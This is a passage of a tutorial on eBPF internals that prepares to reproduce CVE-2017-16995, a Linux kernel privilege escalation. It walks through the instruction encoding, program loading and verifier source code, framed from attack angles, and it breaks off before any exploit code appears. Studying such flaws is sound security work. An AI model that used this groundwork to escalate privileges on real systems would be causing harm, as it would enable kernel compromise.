Getting Started with eBPF & Reproducing CVE-2017-16995

Preface

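CVE-2017-16995 is a kernel privilege-escalation vulnerability in the eBPF subsystem. It affects kernels older than 4.13.9 and stems from a flawed check in the check_alu_op function in kernel/bpf/verifier.c. It lets an unprivileged user mount a denial-of-service attack (memory corruption) or escalate to a privileged user.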

Background

Introduction to eBPF

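As is well known, user space and kernel space on Linux are isolated. To have the kernel run user code you normally need to write a kernel module, and only root can load modules. BPF is, in effect, a fast lane that the kernel opens for users: BPF (Berkeley Packet Filter) provides a bridge for passing code and data between user space and the kernel. A user can hand code to the kernel as eBPF bytecode and trigger its execution through events (for example, writing data to a socket). Data is shared with the kernel through maps (key/value stores): user space writes to a map and the kernel reads from it, or the other way around. BPF was originally designed for low-level network filtering. Because it makes injecting code into the kernel convenient and comes with a full set of safety measures to protect the kernel, it is now widely used for packet capture, kernel probes, performance monitoring, and similar tasks. BPF has gone through two stages, cBPF (classic BPF) and eBPF (extended BPF). cBPF has left the stage, so BPF in the rest of this article means eBPF.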

The eBPF Instruction Set

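eBPF has its own instruction set and can be thought of as a virtual machine. It has 11 virtual registers which, following the calling convention, map onto x86-64 registers as follows.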

R0 -- RAX
R1 -- RDI
R2 -- RSI
R3 -- RDX
R4 -- RCX
R5 -- R8
R6 -- RBX
R7 -- R13
R8 -- R14
R9 -- R15
R10 -- RBP

Each instruction has the following format. Its fields are the opcode, destination register, source register, offset, and immediate.

struct bpf_insn {
    __u8 code;        /* opcode */
    __u8 dst_reg:4;   /* dest register */
    __u8 src_reg:4;   /* source register */
    __s16 off;        /* signed offset */
    __s32 imm;        /* signed immediate constant */
};

For example, the simple x86 assignment mov esi, 0xffffffff corresponds to the BPF instruction BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), which is defined as:

#define BPF_MOV32_IMM(DST, IMM)                     \
    ((struct bpf_insn) {                            \
        .code = BPF_ALU | BPF_MOV | BPF_K,          \
        .dst_reg = DST,                             \
        .src_reg = 0,                               \
        .off = 0,                                   \
        .imm = IMM })
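
To make the encoding concrete, here is a minimal sketch that re-declares the instruction layout locally, using <stdint.h> types in place of the kernel's __u8/__s16/__s32 and hard-coding the opcode constants listed in this article. The helper name mov32_imm is made up for illustration and is not a kernel function, and the 8-byte size is what GCC and Clang are assumed to produce for this layout.

```c
#include <assert.h>
#include <stdint.h>

/* Local copy of the instruction layout, with <stdint.h> types. */
struct bpf_insn {
    uint8_t code;        /* opcode */
    uint8_t dst_reg : 4; /* dest register */
    uint8_t src_reg : 4; /* source register */
    int16_t off;         /* signed offset */
    int32_t imm;         /* signed immediate constant */
};

/* Constants copied from the encoding tables in this article. */
#define BPF_ALU   0x04
#define BPF_MOV   0xb0
#define BPF_K     0x00
#define BPF_REG_2 2

/* Hypothetical helper that mirrors what BPF_MOV32_IMM expands to. */
static struct bpf_insn mov32_imm(uint8_t dst, int32_t imm)
{
    struct bpf_insn insn = {
        .code = BPF_ALU | BPF_MOV | BPF_K,
        .dst_reg = dst,
        .src_reg = 0,
        .off = 0,
        .imm = imm,
    };

    /* Assumption: the compiler packs one instruction into 8 bytes. */
    assert(sizeof(struct bpf_insn) == 8);
    return insn;
}
```

Calling mov32_imm(BPF_REG_2, (int32_t)0xFFFFFFFFu) gives an instruction whose code byte is 0xb4 and whose imm field holds -1, since the immediate is a signed 32-bit value. That signedness matters later in the vulnerability analysis.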

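There are eight opcode classes, distinguished by the low 3 bits of the opcode. BPF_ALU and BPF_ALU64 are arithmetic instructions (BPF_MISC exists only in classic BPF), and the meaning of the other classes can be guessed from their names.
The encoding, taken from the kernel documentation, is shown below. Note that the source still names classes 0x6 and 0x7 after their classic BPF meanings (BPF_RET and BPF_MISC); this article covers eBPF only.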

+----------------+--------+--------------------+
|   4 bits       |  1 bit |   3 bits           |
| operation code | source | instruction class  |
+----------------+--------+--------------------+
(MSB)                                      (LSB)

Three LSB bits store instruction class which is one of:

Classic BPF classes:    eBPF classes:

BPF_LD    0x00          BPF_LD    0x00
BPF_LDX   0x01          BPF_LDX   0x01
BPF_ST    0x02          BPF_ST    0x02
BPF_STX   0x03          BPF_STX   0x03
BPF_ALU   0x04          BPF_ALU   0x04
BPF_JMP   0x05          BPF_JMP   0x05
BPF_RET   0x06          [ class 6 unused, for future if needed ]
BPF_MISC  0x07          BPF_ALU64 0x07

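When the class is BPF_ALU or BPF_JMP, the fourth bit (0x08) encodes the source operand: BPF_K uses the 32-bit immediate as the source operand, and BPF_X uses the source register. The four most significant bits hold the operation code.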

BPF_K     0x00
BPF_X 0x08

When the class is BPF_ALU or BPF_ALU64, the operation is one of the following, i.e. the usual arithmetic and logic operations.

If BPF_CLASS(code) == BPF_ALU or BPF_ALU64 [ in eBPF ], BPF_OP(code) is one of:

BPF_ADD 0x00
BPF_SUB 0x10
BPF_MUL 0x20
BPF_DIV 0x30
BPF_OR 0x40
BPF_AND 0x50
BPF_LSH 0x60
BPF_RSH 0x70
BPF_NEG 0x80
BPF_MOD 0x90
BPF_XOR 0xa0
BPF_MOV 0xb0 /* eBPF only: mov reg to reg */
BPF_ARSH 0xc0 /* eBPF only: sign extending shift right */
BPF_END 0xd0 /* eBPF only: endianness conversion */

When the class is BPF_JMP, the operation is one of the following, covering conditional and unconditional jumps.

If BPF_CLASS(code) == BPF_JMP, BPF_OP(code) is one of:

BPF_JA 0x00
BPF_JEQ 0x10
BPF_JGT 0x20
BPF_JGE 0x30
BPF_JSET 0x40
BPF_JNE 0x50 /* eBPF only: jump != */
BPF_JSGT 0x60 /* eBPF only: signed '>' */
BPF_JSGE 0x70 /* eBPF only: signed '>=' */
BPF_CALL 0x80 /* eBPF only: function call */
BPF_EXIT 0x90 /* eBPF only: function return */

A small example: BPF_ADD | BPF_X | BPF_ALU means dst_reg = (u32) dst_reg + (u32) src_reg, and BPF_XOR | BPF_K | BPF_ALU means dst_reg = (u32) dst_reg ^ (u32) imm32.
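
The bit layout can be exercised with a few lines of C. The sketch below hard-codes the constants from the tables above and uses the same masks as the kernel's BPF_CLASS, BPF_OP and BPF_SRC macros. The function alu32 is a hypothetical toy model of two 32-bit ALU operations and is not kernel code.

```c
#include <stdint.h>

/* Field extractors: low 3 bits = class, bit 3 = source, high 4 bits = op. */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_OP(code)    ((code) & 0xf0)
#define BPF_SRC(code)   ((code) & 0x08)

#define BPF_ALU 0x04
#define BPF_K   0x00
#define BPF_X   0x08
#define BPF_ADD 0x00
#define BPF_XOR 0xa0

/*
 * Hypothetical toy model of a 32-bit ALU instruction (only ADD and XOR).
 * The second operand is the source register for BPF_X and the immediate
 * for BPF_K; the 32-bit result is zero-extended into the 64-bit register.
 */
static uint64_t alu32(uint8_t code, uint64_t dst, uint64_t src, int32_t imm)
{
    uint32_t operand = (BPF_SRC(code) == BPF_X) ? (uint32_t)src
                                                : (uint32_t)imm;
    uint32_t result = (uint32_t)dst;

    switch (BPF_OP(code)) {
    case BPF_ADD:
        result += operand;
        break;
    case BPF_XOR:
        result ^= operand;
        break;
    default:
        break; /* other operations are not modeled here */
    }
    return result;
}
```

With these definitions, BPF_ADD | BPF_X | BPF_ALU evaluates to 0x0c and BPF_XOR | BPF_K | BPF_ALU to 0xa4, and alu32 wraps at 32 bits: adding 1 to 0xffffffff yields 0.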

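How an eBPF Program Is Loaded

A typical BPF program goes through the following steps:

  1. The user program calls syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)) to create a map. The attr structure specifies the map's type, sizes, maximum capacity, and other attributes.
  2. The user program calls syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) to load our BPF code into the kernel. The attr structure contains the instruction count, a pointer to the first instruction, the log level, and other attributes. Before loading, the kernel performs a safety check by simulated execution. It checks instruction syntax, the instruction count, and the ranges and read/write permissions of pointers and immediates in the instructions; it forbids exposing kernel addresses to user space and forbids reads and writes to kernel addresses outside the BPF program's stack. Once the check passes, the program is loaded into the kernel, and the checks are not repeated when it actually runs.
  3. The user program calls setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) to attach our BPF program to the given socket. progfd is the return value of the previous step.
  4. The user program operates on the socket from the previous step to trigger the actual execution of the BPF program.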

    BPF_MAP_CREATE

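    This command first calls map_create. In essence it allocates a block of memory whose size is the management structure plus the size given in attr, assigns it an fd, and adds it to the map list so that it can later be looked up by fd.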
    /* called via syscall */
    static int map_create(union bpf_attr *attr)
    {
    struct bpf_map *map;
    int err;

    err = CHECK_ATTR(BPF_MAP_CREATE);
    if (err)
    return -EINVAL;

    /* find map type and init map: hashtable vs rbtree vs bloom vs ... */
    map = find_and_alloc_map(attr);
    if (IS_ERR(map))
    return PTR_ERR(map);

    atomic_set(&map->refcnt, 1);
    atomic_set(&map->usercnt, 1);

    err = bpf_map_charge_memlock(map);
    if (err)
    goto free_map;

    err = bpf_map_new_fd(map);
    if (err < 0)
    /* failed to allocate fd */
    goto free_map;

    return err;

    free_map:
    map->ops->map_free(map);
    return err;
    }

    BPF_PROG_LOAD

    This command loads the user's eBPF program into the kernel and involves several checks.

    bpf_prog_load

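    Execution first enters bpf_prog_load, which works as follows.
    [1] checks whether the eBPF program's license is a GPL-compatible one.
    [2] checks whether the instruction count exceeds 4096.
    [3] allocates a bpf_prog structure together with the memory that will hold the eBPF program.
    [4] copies the eBPF program from user space into the newly allocated memory.
    [5] determines the program type: socket_filter filters packets, while tracing_filter covers tracing programs such as kprobes. Execution then reaches [6], where the user-supplied program is verified. If verification passes, the program's run function is set to __bpf_prog_run, the real execution function, and JIT compilation is attempted, falling back to the interpreter otherwise.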
    static int bpf_prog_load(union bpf_attr *attr)
    {
    enum bpf_prog_type type = attr->prog_type;
    struct bpf_prog *prog;
    int err;
    char license[128];
    bool is_gpl;

    if (CHECK_ATTR(BPF_PROG_LOAD))
    return -EINVAL;

    /* copy eBPF program license from user space */
    if (strncpy_from_user(license, u64_to_ptr(attr->license),
    sizeof(license) - 1) < 0)
    return -EFAULT;
    license[sizeof(license) - 1] = 0;

    /* eBPF programs must be GPL compatible to use GPL-ed functions */
    [1] is_gpl = license_is_gpl_compatible(license);

    [2] if (attr->insn_cnt >= BPF_MAXINSNS) // 4096
    return -EINVAL;

    if (type == BPF_PROG_TYPE_KPROBE &&
    attr->kern_version != LINUX_VERSION_CODE)
    return -EINVAL;

    if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
    return -EPERM;

    /* plain bpf_prog allocation */
    [3] prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
    if (!prog)
    return -ENOMEM;

    err = bpf_prog_charge_memlock(prog);
    if (err)
    goto free_prog_nouncharge;

    prog->len = attr->insn_cnt;

    err = -EFAULT;
    [4] if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
    prog->len * sizeof(struct bpf_insn)) != 0)
    goto free_prog;

    prog->orig_prog = NULL;
    prog->jited = 0;

    atomic_set(&prog->aux->refcnt, 1);
    prog->gpl_compatible = is_gpl ? 1 : 0;

    /* find program type: socket_filter vs tracing_filter */
    [5] err = find_prog_type(type, prog);
    if (err < 0)
    goto free_prog;

    /* run eBPF verifier */
    [6] err = bpf_check(&prog, attr);
    if (err < 0)
    goto free_used_maps;

    /* fixup BPF_CALL->imm field */
    fixup_bpf_calls(prog);

    /* eBPF program is ready to be JITed */
    err = bpf_prog_select_runtime(prog);
    if (err < 0)
    goto free_used_maps;

    err = bpf_prog_new_fd(prog);
    if (err < 0)
    /* failed to allocate fd */
    goto free_used_maps;

    return err;

    free_used_maps:
    free_used_maps(prog->aux);
    free_prog:
    bpf_prog_uncharge_memlock(prog);
    free_prog_nouncharge:
    bpf_prog_free(prog);
    return err;
    }

    bpf_check

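    Next comes the verification logic, bpf_check, which works as follows.
    [1] replaces the map fd in specific instructions with the address of the corresponding map. Note that this is an 8-byte kernel address, so two instruction slots are needed to store it; see the analysis of this function below.
    [2] borrows the idea of a control-flow graph to check whether the eBPF program contains loops or jumps to invalid locations, which would lead to unpredictable behavior.
    [3] is the simulated-execution check and the heart of verification. If any of these steps finds a problem, the program is rejected.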
    int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
    {
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;

    // check the instruction count
    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
    return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
    * allocate/free it every time bpf_check() is called
    */
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
    return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
    /* user requested verbose verifier output
    * and supplied buffer to store the verification trace
    */
    log_level = attr->log_level;
    log_ubuf = (char __user *) (unsigned long) attr->log_buf;
    log_size = attr->log_size;
    log_len = 0;

    ret = -EINVAL;
    /* log_* values have to be sane */
    if (log_size < 128 || log_size > UINT_MAX >> 8 ||
    log_level == 0 || log_ubuf == NULL)
    goto free_env;

    ret = -ENOMEM;
    log_buf = vmalloc(log_size);
    if (!log_buf)
    goto free_env;
    } else {
    log_level = 0;
    }
    // replace the map fd in pseudo instructions with the map address; the address is 8 bytes, so it is stored in the 4-byte imm fields of this instruction and the next
    [1] ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
    goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
    sizeof(struct verifier_state_list *),
    GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
    goto skip_full_check;

    [2] ret = check_cfg(env);
    if (ret < 0)
    goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

    [3] ret = do_check(env);

    skip_full_check:
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
    /* program is valid, convert *(u32*)(ctx + off) accesses */
    ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
    BUG_ON(log_len >= log_size);
    /* verifier log exceeded user supplied buffer */
    ret = -ENOSPC;
    /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
    ret = -EFAULT;
    goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
    /* if program passed verifier, update used_maps in bpf_prog_info */
    env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
    sizeof(env->used_maps[0]),
    GFP_KERNEL);

    if (!env->prog->aux->used_maps) {
    ret = -ENOMEM;
    goto free_log_buf;
    }

    memcpy(env->prog->aux->used_maps, env->used_maps,
    sizeof(env->used_maps[0]) * env->used_map_cnt);
    env->prog->aux->used_map_cnt = env->used_map_cnt;

    /* program is valid. Convert pseudo bpf_ld_imm64 into generic
    * bpf_ld_imm64 instructions
    */
    convert_pseudo_ld_imm64(env);
    }

    free_log_buf:
    if (log_level)
    vfree(log_buf);
    free_env:
    if (!env->prog->aux->used_maps)
    /* if we didn't copy map pointers into bpf_prog_info, release
    * them now. Otherwise free_bpf_prog_info() will release them.
    */
    release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
    }

    replace_map_fd_with_map_ptr

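    In replace_map_fd_with_map_ptr, when conditions [1] and [2] both hold, i.e. opcode == BPF_LD | BPF_IMM | BPF_DW == 0x18 and src_reg == BPF_PSEUDO_MAP_FD == 1, the function looks up the map using the value of imm and splits the resulting address into two halves, stored in the imm fields of this instruction and the next one. This matches the two-instruction layout mentioned above. An instruction meeting both conditions is named BPF_LD_MAP_FD; it loads the map address into a register, and the instruction slot that follows it must be meaningless padding.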
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {
    if (BPF_CLASS(insn->code) == BPF_LDX &&
    (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
    verbose("BPF_LDX uses reserved fields\n");
    return -EINVAL;
    }// LDX must use BPF_MEM mode with imm == 0 (reserved fields)

    if (BPF_CLASS(insn->code) == BPF_STX &&
    ((BPF_MODE(insn->code) != BPF_MEM &&
    BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
    verbose("BPF_STX uses reserved fields\n");
    return -EINVAL;
    }// STX must use BPF_MEM or BPF_XADD mode with imm == 0 (reserved fields)

    [1] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
    struct bpf_map *map;
    struct fd f;

    if (i == insn_cnt - 1 || insn[1].code != 0 ||
    insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
    insn[1].off != 0) {
    verbose("invalid bpf_ld_imm64 insn\n");
    return -EINVAL;
    }// must not be the last instruction; the next slot must be zero apart from imm

    if (insn->src_reg == 0)
    /* valid generic load 64-bit imm */
    goto next_insn;

    [2] if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
    verbose("unrecognized bpf_ld_imm64 insn\n");
    return -EINVAL;
    }

    f = fdget(insn->imm);
    map = __bpf_map_get(f);
    if (IS_ERR(map)) {
    verbose("fd %d is not pointing to valid bpf_map\n",
    insn->imm);
    return PTR_ERR(map);
    }

    /* store map pointer inside BPF_LD_IMM64 instruction */
    insn[0].imm = (u32) (unsigned long) map;
    insn[1].imm = ((u64) (unsigned long) map) >> 32;

    /* check whether we recorded this map already */
    for (j = 0; j < env->used_map_cnt; j++)
    if (env->used_maps[j] == map) {
    fdput(f);
    goto next_insn;
    }

    if (env->used_map_cnt >= MAX_USED_MAPS) {
    fdput(f);
    return -E2BIG;
    }

    /* hold the map. If the program is rejected by verifier,
    * the map will be released by release_maps() or it
    * will be used by the valid program until it's unloaded
    * and all maps are released in free_bpf_prog_info()
    */
    map = bpf_map_inc(map, false);
    if (IS_ERR(map)) {
    fdput(f);
    return PTR_ERR(map);
    }
    env->used_maps[env->used_map_cnt++] = map;

    fdput(f);
    next_insn:
    insn++;
    i++;
    }
    }

    /* now all pseudo BPF_LD_IMM64 instructions load valid
    * 'struct bpf_map *' into a register instead of user map_fd.
    * These pointers will be used later by verifier to validate map access.
    */
    return 0;
    }
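
The two-slot storage of the map address comes down to splitting a 64-bit value across two signed 32-bit imm fields and joining them again. A minimal sketch of that arithmetic follows; the names imm_pair, split_ptr and join_ptr are invented for this illustration, and the address used in the note afterwards is an arbitrary example value.

```c
#include <stdint.h>

/* The imm fields of the two consecutive instruction slots. */
struct imm_pair {
    int32_t lo; /* insn[0].imm: low 32 bits of the address */
    int32_t hi; /* insn[1].imm: high 32 bits of the address */
};

/* Split a 64-bit address the way the verifier stores a map pointer. */
static struct imm_pair split_ptr(uint64_t ptr)
{
    struct imm_pair p;

    p.lo = (int32_t)(uint32_t)ptr;
    p.hi = (int32_t)(uint32_t)(ptr >> 32);
    return p;
}

/*
 * Rebuild the address. Both halves go through uint32_t first so that a
 * negative imm is not sign-extended into the upper bits.
 */
static uint64_t join_ptr(struct imm_pair p)
{
    return (uint64_t)(uint32_t)p.lo | ((uint64_t)(uint32_t)p.hi << 32);
}
```

For an example address such as 0xffff8800deadbeef, both halves are negative when viewed as int32_t, which is why the casts through uint32_t in join_ptr are needed to get the original value back.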

    do_check

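    Next is do_check, the core of the verification process. The whole function is one endless for loop that maintains a set of registers whose definition and initialization are shown below. Each register's value is an int, accompanied by an enum type field; the types include uninitialized, unknown value, immediate, pointer, and so on. At initialization every register is marked uninitialized with value 0. R10 is then set up as the frame (stack) pointer and R1 as the context pointer.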
    struct reg_state {
    enum bpf_reg_type type;
    union {
    /* valid when type == CONST_IMM | PTR_TO_STACK */
    int imm;

    /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
    * PTR_TO_MAP_VALUE_OR_NULL
    */
    struct bpf_map *map_ptr;
    };
    };
    static void init_reg_state(struct reg_state *regs)
    {
    int i;

    for (i = 0; i < MAX_BPF_REG; i++) {
    regs[i].type = NOT_INIT;
    regs[i].imm = 0;
    regs[i].map_ptr = NULL;
    }

    /* frame pointer */
    regs[BPF_REG_FP].type = FRAME_PTR;

    /* 1st arg to a function */
    regs[BPF_REG_1].type = PTR_TO_CTX;
    }
    /* types of values stored in eBPF registers */
    enum bpf_reg_type {
    NOT_INIT = 0, /* nothing was written into register */
    UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
    PTR_TO_CTX, /* reg points to bpf_context */
    CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
    PTR_TO_MAP_VALUE, /* reg points to map element value */
    PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
    FRAME_PTR, /* reg == frame_pointer */
    PTR_TO_STACK, /* reg == frame_pointer + imm */
    CONST_IMM, /* constant integer value */
    };
    do_check processes instructions one at a time, applying a different check to each instruction class.
    static int do_check(struct verifier_env *env)
    {
    ...
    init_reg_state(regs);
    insn_idx = 0;
    for (;;) {
    struct bpf_insn *insn;
    u8 class;
    int err;

    if (insn_idx >= insn_cnt) {
    verbose("invalid insn idx %d insn_cnt %d\n",
    insn_idx, insn_cnt);
    return -EFAULT;
    }

    // fetch one instruction per iteration
    insn = &insns[insn_idx];
    // get the instruction class
    class = BPF_CLASS(insn->code);
    ...
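    There are too many instructions to cover one by one, so the following looks at how the verifier works from two attack angles.
    How the for loop finishes and exits
    The exit instruction is BPF_EXIT, which belongs to the BPF_JMP class. When the verifier meets it, it calls pop_stack. If the return value is negative, it breaks out of the endless loop; otherwise the return value becomes the index of the next instruction to check. The idea is that on a conditional jump the verifier follows one branch and pushes the other onto a stack; when a branch finishes, it pops and checks the other one, much like backtracking with a stack when a maze solver hits a dead end.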
    else if (class == BPF_JMP) {
    u8 opcode = BPF_OP(insn->code);

    if (opcode == BPF_CALL) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->off != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_CALL uses reserved fields\n");
    return -EINVAL;
    }

    err = check_call(env, insn->imm);
    if (err)
    return err;

    } else if (opcode == BPF_JA) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->imm != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_JA uses reserved fields\n");
    return -EINVAL;
    }

    insn_idx += insn->off + 1;
    continue;

    } else if (opcode == BPF_EXIT) {
    if (BPF_SRC(insn->code) != BPF_K ||
    insn->imm != 0 ||
    insn->src_reg != BPF_REG_0 ||
    insn->dst_reg != BPF_REG_0) {
    verbose("BPF_EXIT uses reserved fields\n");
    return -EINVAL;
    }

    /* eBPF calling convetion is such that R0 is used
    * to return the value from eBPF program.
    * Make sure that it's readable at this time
    * of bpf_exit, which means that program wrote
    * something into it earlier
    */
    err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
    if (err)
    return err;

    if (is_pointer_value(env, BPF_REG_0)) {
    verbose("R0 leaks addr as return value\n");
    return -EACCES;
    }

    process_bpf_exit:
    insn_idx = pop_stack(env, &prev_insn_idx);
    if (insn_idx < 0) {
    break;
    } else {
    do_print_state = true;
    continue;
    }
    } else {
    err = check_cond_jmp_op(env, insn, &insn_idx);
    if (err)
    return err;
    }
    }
    Now look at pop_stack. It first tests whether env->head is NULL; if so, there are no unchecked paths left. Otherwise it restores the saved state.
    static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
    {
    struct verifier_stack_elem *elem;
    int insn_idx;

    if (env->head == NULL)
    return -1;

    memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
    insn_idx = env->head->insn_idx;
    if (prev_insn_idx)
    *prev_insn_idx = env->head->prev_insn_idx;
    elem = env->head->next;
    kfree(env->head);
    env->head = elem;
    env->stack_size--;
    return insn_idx;
    }

    #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */

    /* single container for all structs
    * one verifier_env per bpf_check() call
    */
    struct verifier_env {
    struct bpf_prog *prog; /* eBPF program being verified */
    struct verifier_stack_elem *head; /* stack of verifier states to be processed */
    int stack_size; /* number of states to be processed */
    struct verifier_state cur_state; /* current verifier state */
    struct verifier_state_list **explored_states; /* search pruning optimization */
    struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by eBPF program */
    u32 used_map_cnt; /* number of used maps */
    bool allow_ptr_leaks;
    };
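
The pending-branch stack can be modeled in isolation. The sketch below is a stripped-down stand-in, assuming only that each stack element records the instruction index of a branch that still has to be checked; the real structure also saves the whole register state. The names mini_env, push_branch and pop_branch are hypothetical.

```c
#include <stdlib.h>

/* One pending branch: just the index of the instruction to resume at. */
struct stack_elem {
    int insn_idx;
    struct stack_elem *next;
};

/* Minimal stand-in for the part of verifier_env used by the stack. */
struct mini_env {
    struct stack_elem *head; /* top of the pending-branch stack */
    int stack_size;          /* number of pending branches */
};

/* Remember a branch to verify later. Returns 0 on success, -1 on OOM. */
static int push_branch(struct mini_env *env, int insn_idx)
{
    struct stack_elem *elem = malloc(sizeof(*elem));

    if (!elem)
        return -1;
    elem->insn_idx = insn_idx;
    elem->next = env->head;
    env->head = elem;
    env->stack_size++;
    return 0;
}

/* Take the most recent pending branch, or return -1 when none is left. */
static int pop_branch(struct mini_env *env)
{
    struct stack_elem *elem = env->head;
    int insn_idx;

    if (elem == NULL)
        return -1;
    insn_idx = elem->insn_idx;
    env->head = elem->next;
    free(elem);
    env->stack_size--;
    return insn_idx;
}
```

A negative return from pop_branch plays the same role as the negative return of pop_stack: it tells the caller that every path has been explored and the loop can end. If a branch is never pushed, as in the vulnerable case analyzed later, it is simply never visited.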
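    Next is check_cond_jmp_op, which handles conditional branches. It splits jumps into two cases. Case [1] is a JEQ or JNE that compares against an immediate while the register is a known constant equal to that immediate: the verifier then knows the outcome and follows only the branch that will be taken. Case [2] covers everything else: the target insn_idx + off + 1 is pushed onto the stack as the other branch.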
     int check_cond_jmp_op(struct verifier_env *env,
    struct bpf_insn *insn, int *insn_idx)
    {
    struct reg_state *regs = env->cur_state.regs;
    struct verifier_state *other_branch;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode > BPF_EXIT) {
    verbose("invalid BPF_JMP opcode %x\n", opcode);
    return -EINVAL;
    }

    if (BPF_SRC(insn->code) == BPF_X) {
    if (insn->imm != 0) {
    verbose("BPF_JMP uses reserved fields\n");
    return -EINVAL;
    }

    /* check src1 operand */
    err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;

    if (is_pointer_value(env, insn->src_reg)) {
    verbose("R%d pointer comparison prohibited\n",
    insn->src_reg);
    return -EACCES;
    }
    } else {
    if (insn->src_reg != BPF_REG_0) {
    verbose("BPF_JMP uses reserved fields\n");
    return -EINVAL;
    }
    }

    /* check src2 operand */
    err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
    if (err)
    return err;

    /* detect if R == 0 where R was initialized to zero earlier */
    [1] if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == CONST_IMM &&
    regs[insn->dst_reg].imm == insn->imm) {
    if (opcode == BPF_JEQ) {
    /* if (imm == imm) goto pc+off;
    * only follow the goto, ignore fall-through
    */
    *insn_idx += insn->off;
    return 0;
    } else {
    /* if (imm != imm) goto pc+off;
    * only follow fall-through branch, since
    * that's where the program will go
    */
    return 0;
    }
    }

    [2] other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
    if (!other_branch)
    return -EFAULT;

    /* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
    if (BPF_SRC(insn->code) == BPF_K &&
    insn->imm == 0 && (opcode == BPF_JEQ ||
    opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
    if (opcode == BPF_JEQ) {
    /* next fallthrough insn can access memory via
    * this register
    */
    regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
    /* branch targer cannot access it, since reg == 0 */
    other_branch->regs[insn->dst_reg].type = CONST_IMM;
    other_branch->regs[insn->dst_reg].imm = 0;
    } else {
    other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = 0;
    }
    } else if (is_pointer_value(env, insn->dst_reg)) {
    verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
    return -EACCES;
    } else if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE)) {

    if (opcode == BPF_JEQ) {
    /* detect if (R == imm) goto
    * and in the target state recognize that R = imm
    */
    other_branch->regs[insn->dst_reg].type = CONST_IMM;
    other_branch->regs[insn->dst_reg].imm = insn->imm;
    } else {
    /* detect if (R != imm) goto
    * and in the fall-through state recognize that R = imm
    */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
    }
    }
    if (log_level)
    print_verifier_state(env);
    return 0;
    }
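    Can memory be read or written directly?
    Memory reads and writes mainly use BPF_LDX_MEM and BPF_STX_MEM instructions. For example, if the values of r7 and r8 below were controllable, this would be an arbitrary memory write, similar to mov qword ptr [r7], r8.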
    STX_MEM_DW(8,7,0x0,0x0)
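    Now let us see what restrictions apply to ST and LD. check_reg_arg at [1] checks that the register number does not exceed the maximum of 10. For SRC_OP it checks that the register is not uninitialized; otherwise it checks that the write target is not the frame pointer (R10, mapped to rbp) and, for DST_OP, marks the register being written as UNKNOWN_VALUE. Then comes check_mem_access at [2], which, depending on the access type, checks whether the dst or src register is a stack pointer, a context (packet) pointer, or a map value pointer, and otherwise refuses the read or write.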
    else if (class == BPF_LDX) {
    enum bpf_reg_type src_reg_type;

    /* check for reserved fields is already done */

